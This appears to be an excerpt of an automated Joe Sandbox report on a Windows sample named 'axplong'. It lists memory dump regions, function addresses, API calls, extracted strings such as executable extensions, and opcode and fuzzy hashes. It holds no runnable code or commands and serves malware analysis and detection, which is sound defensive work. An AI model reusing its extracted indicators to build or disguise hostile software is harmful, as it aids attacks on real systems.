                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-2390467879
                      • Opcode ID: fe0c9c733527c214db28343d45a426324f1e54a86afdd22004a0a473af45ba8b
                      • Instruction ID: 28f08975d07059037fa07c63a2f5f80012e67b682f74ac7c6389d1f95fd52c8a
                      • Opcode Fuzzy Hash: fe0c9c733527c214db28343d45a426324f1e54a86afdd22004a0a473af45ba8b
                      • Instruction Fuzzy Hash: 6C028C70A00248EFEF14EFA8C859BDEBBB5FF45304F504559E805A7382D7759A84CBA2
                      Function 008D70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _wcsrchr
                      • String ID: .bat$.cmd$.com$.exe
                      • API String ID: 1752292252-4019086052
                      • Opcode ID: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
                      • Instruction ID: 515a262c66b51ffdf8f6733f96aff83b0f3fb86a89d06a6d55a910d6c8683cb7
                      • Opcode Fuzzy Hash: 103f607900e454442bf64c0f4fd8bb58ee9a39238460a0f502b2e2fa25345fc7
                      • Instruction Fuzzy Hash: 3A014E37608656321A18242D9C0263B2798FB82FB4726032BFE54F73C2FF44DC0281A1
                      Function 008A2E80 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Mtx_unlock$Cnd_broadcast
                      • String ID:
                      • API String ID: 32384418-0
                      • Opcode ID: 498b3f195378974298380e79717cfaeecb27177a17fe0005ea007d878589649d
                      • Instruction ID: 3d8b70c8962ec873e54bfd7b2fdee9cf86bc193617ad41a775f75a94272c8c9c
                      • Opcode Fuzzy Hash: 498b3f195378974298380e79717cfaeecb27177a17fe0005ea007d878589649d
                      • Instruction Fuzzy Hash: 95A1C0B0A017059FEB21DF68C945BAAB7B8FF16314F048129F815D7B41EB75EA04CB92
                      Function 008DC9B0 Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction ID: a31ede98ce63163abafa49e1b3f8f6800ae5c0d80857d17a549f405c852be3aa
                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                      • Instruction Fuzzy Hash: 63B1467291029B9FDB11CF28C881BAEBBE5FF55310F1482ABE949EB341D6348D41CB61
                      Function 008BBAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000008.00000002.2692250430.00000000008A1000.00000040.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true
                      • Associated: 00000008.00000002.2692198261.00000000008A0000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692250430.0000000000902000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692348640.0000000000909000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.000000000090B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000A92000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B6C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000B99000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692377354.0000000000BAF000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692785243.0000000000BB0000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692928442.0000000000D46000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692956045.0000000000D47000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2692977332.0000000000D48000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000008.00000002.2693002074.0000000000D49000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_8a0000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Xtime_diff_to_millis2_xtime_get
                      • String ID:
                      • API String ID: 531285432-0
                      • Opcode ID: 5281f4d82f1dd3f79303d55b05d274a3657765315542aae444a8d3bc8aaa8e16
                      • Instruction ID: b5511c2f85c724272e5ef9bf7c9eca009b63694108b7c61f9090460f5e16ef00
                      • Opcode Fuzzy Hash: 5281f4d82f1dd3f79303d55b05d274a3657765315542aae444a8d3bc8aaa8e16
                      • Instruction Fuzzy Hash: 1321FB71A012199FDF11EFA8D8859EEBBB8FF48714F104065F501E7351DB70AD019BA2